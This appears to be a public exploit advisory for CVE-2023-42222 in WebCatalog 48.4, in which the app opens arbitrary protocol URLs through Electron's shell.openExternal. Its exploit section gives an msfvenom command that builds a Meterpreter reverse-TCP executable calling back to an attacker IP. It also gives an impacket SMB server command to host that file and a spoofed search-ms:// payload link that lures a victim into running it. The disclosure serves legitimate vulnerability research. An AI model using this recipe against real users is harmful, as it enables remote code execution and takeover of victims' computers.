WebCatalog 48.4 Arbitrary Protocol Execution / Code Execution

2024.02.02
Credit: ItsSixtyN3in
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution # Date: 9/27/2023 # Exploit Author: ItsSixtyN3in # Vendor Homepage: https://webcatalog.io/en/ # Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe # Version: 48.4.0 # Tested on: Windows # CVE : CVE-2023-42222 Vulnerability summary: WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery. Exploit details: - Create a reverse shell file. msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe - Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py) python3 smbserver.py Tools -smb2support - Have the user sync a page with the payload as a renamed link [Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title) Payload: search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title Tobias Diehl Security Consultant OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300 Pronouns: he/him e-mail: tobias.diehl@bulletproofsi.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top